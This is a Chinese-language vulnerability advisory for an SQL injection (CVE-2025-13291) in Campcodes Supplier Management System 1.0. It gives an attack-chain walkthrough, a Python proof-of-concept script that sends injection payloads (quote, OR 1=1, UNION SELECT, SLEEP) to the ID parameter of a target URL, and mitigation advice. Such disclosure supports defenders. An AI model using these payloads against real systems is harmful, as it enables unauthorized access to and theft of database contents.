CVE-2025-13291 Campcodes供应商管理系统ID参数SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13291

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Campcodes Supplier Management System 1.0

漏洞概述

CVE-2025-13291是Campcodes供应商管理系统1.0版本中存在的高危安全漏洞。该漏洞位于/manufacturer/confirm_order.php文件中的ID参数，由于未对用户输入进行充分的过滤和参数化处理，导致存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句，利用该参数直接与数据库进行交互，实现未授权的数据访问、修改或删除操作。由于该漏洞的CVSS评分达到7.3，且攻击向量为网络层面，无需任何认证和用户交互即可利用，因此具有较高的安全风险。漏洞已于2025年11月17日公开披露，相关的利用代码和攻击方式已在互联网传播，建议受影响的用户尽快采取防护措施。

技术细节

该SQL注入漏洞源于/manufacturer/confirm_order.php文件对ID参数的直接使用，未采用参数化查询或输入验证机制。攻击者可以通过在ID参数中注入SQL语句片段，如使用单引号(')、UNION SELECT语句或布尔盲注技术，绕过应用层的限制，直接与后端数据库交互。典型的利用方式包括：1) 使用单引号测试注入点，观察数据库错误响应；2) 使用UNION语句获取其他表的敏感数据；3) 使用布尔盲注根据页面响应差异推断数据库信息。由于该漏洞影响的是供应商管理系统，攻击者可能通过此漏洞获取订单信息、供应商数据、用户信息等敏感商业数据，甚至可能通过OUTFILE等操作获取服务器权限。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者访问目标网站，识别使用的Campcodes供应商管理系统，并定位到/manufacturer/confirm_order.php端点

STEP 2

步骤2

注入点识别：攻击者通过在ID参数中输入单引号(')等特殊字符，观察页面响应以确认SQL注入漏洞的存在

STEP 3

步骤3

构造恶意载荷：攻击者根据数据库类型构造SQL注入载荷，如UNION SELECT语句或布尔盲注表达式

STEP 4

步骤4

数据提取：利用SQL注入漏洞提取数据库中的敏感信息，如用户凭证、订单数据、供应商信息等

STEP 5

步骤5

权限提升或持久化：攻击者可能利用获取的信息进一步控制系统，或在数据库中植入后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13291 SQL Injection PoC
# Target: Campcodes Supplier Management System 1.0
# Endpoint: /manufacturer/confirm_order.php

def test_sqli(url, param_id):
    # Test basic SQL injection with single quote
    target_url = f"{url}/manufacturer/confirm_order.php"
    
    # Test payload: ID parameter with SQL injection
    payloads = [
        "1'",  # Basic injection test
        "1' OR '1'='1",  # OR injection
        "1' UNION SELECT NULL--",  # Union-based injection
        "1' AND SLEEP(5)--"  # Time-based blind injection
    ]
    
    for payload in payloads:
        params = {"id": payload}
        try:
            response = requests.get(target_url, params=params, timeout=10)
            print(f"[*] Testing payload: {payload}")
            print(f"[*] Status: {response.status_code}")
            print(f"[*] Response length: {len(response.text)}")
            
            # Check for SQL error indicators
            sql_errors = ['mysql', 'sql', 'syntax', 'error', 'warning']
            if any(err in response.text.lower() for err in sql_errors):
                print("[!] Potential SQL injection detected!")
                return True
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-13291.py <target_url>")
        print("Example: python cve-2025-13291.py http://target.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    print(f"[*] Testing CVE-2025-13291 on {target}")
    test_sqli(target, "id")

影响范围

Campcodes Supplier Management System 1.0

防御指南

临时缓解措施

在厂商发布修复版本之前，可采取以下临时缓解措施：1) 通过Web服务器配置限制对/manufacturer/confirm_order.php的访问，仅允许受信任的IP地址访问；2) 在应用层对ID参数进行严格的输入验证，过滤单引号、分号、UNION等SQL关键字；3) 临时禁用该功能模块，待官方发布补丁后再恢复使用；4) 加强数据库账户权限控制，限制应用账户的表访问权限；5) 部署入侵检测系统监控异常的SQL查询行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13291
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13291
3 Details https://www.cvedetails.com/cve/CVE-2025-13291/
4 VulDB https://vuldb.com/cve/CVE-2025-13291
5 Link https://github.com/Fex212/CVE/issues/1
6 Link https://vuldb.com/?ctiid.332632
7 Link https://vuldb.com/?id.332632
8 Link https://vuldb.com/?submit.691620
9 Link https://www.campcodes.com/